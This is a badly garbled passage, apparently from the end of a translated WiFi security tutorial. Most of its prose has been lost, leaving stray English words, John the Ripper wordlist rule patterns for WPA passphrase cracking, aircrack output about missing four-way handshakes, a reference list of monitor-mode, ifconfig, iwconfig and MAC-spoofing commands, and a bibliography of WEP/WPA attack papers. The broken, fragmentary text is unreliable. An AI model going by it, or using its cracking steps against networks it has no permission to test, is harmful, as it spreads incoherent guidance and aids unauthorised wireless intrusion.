sE3sl1$[0-9]
sE3sl1$[0-9]$[0-9]
sE3sl1$[0-9]$[0-9]$[0-9]
, dictionary
passphrases.
passphrase ;
! JtR
passphrases
dictionaries.
John,
.
wordlist coWPAtty 10,201 . John
489,989.
45,720,022! ,
.
out
there. ,
, 45 passphrases
, 6 ...
45
, ,
WPA passphrase , ..
13. ...
Four-way Handshake!
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
four-way handshake. , ,
.
, airodump-ng BSSID
IV's.
AP. BSSID
, acknowledgements (ACKs), .
BSSID , airodump.
14.
monitor mode chipsets atheros:
interface:
airmon-ng stop [interface]
ifconfig [interface] down
Intel PRO/Wireless 3945ABG
modprobe -r iwl3945
modprobe ipwraw
modprobe iwl3945
Madwifi-ng Commands:
madwifi access points (VAPS), wireless
wireless . (wireless card = wifi0)
wlanconfig athx destroy
( athx VAP)
wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor]
athx VAP
ifconfig Commands:
ifconfig [interface] up
( interface)
ifconfig [interface] down
( interface)
ifconfig [interface] [IP address] netmask [subnet-mask]
( IP subnet-mask)
ifconfig [interface] hw ether [MAC]
( mac address wireless )
iwconfig Commands:
iwconfig [interface] mode [master|managed|adhoc|monitor]
iwconfig [interface] essid [any|essid]
iwconfig [interface] key [hex|s:ascii|off|open]
iwconfig [interface] channel [#|auto]
iwconfig [interface] freq 2.422G
iwconfig [interface] ap [mac address]
iwconfig [interface] rate [auto|#M]
iwpriv Commands:
iwpriv [interface] monitor [A] [B]
[A]
0 = disable monitor mode
1 = enable monitor mode with Prism2 header
2 = enable monitor mode with no Prism2
[B] Channel to monitor (1-14)
http://anonsvn.wireshark.org/wireshark/trunk/manuf
e-books
Sohail/Vivek: Caffe-Latte attack
hakin9: WiFi Security
Bittau/Handley/Lackey: The Final Nail in WEP's Coffin
Bittau: Fragmentation Attack in Practice
Foundstone (antoniewitz): 802.11 Attacks
Levente Buttyán/László Dóra: WiFi Security WEP and 802.11i
Richard Yang:Security and Cooperation in Wireless and Mobile Networks
Pyshkin/Tews/Weinmann:Breaking 104 bit WEP in less than 60 seconds
Changhua/Mitchell: Analysis of the 802.11i 4-Way Handshake
PGP corp: Introduction to cryptography
Logicallysecure:Wireless linux commands
websites
Wikipedia
Aircrack-ng wiki
wi-fiplanet.com
infoworld.com
airtightnetworks.com
remote-exploit.org
madwifi.org
lifehack.ws
kismetwireless.net
License: CC 3.0 attribution-sharealike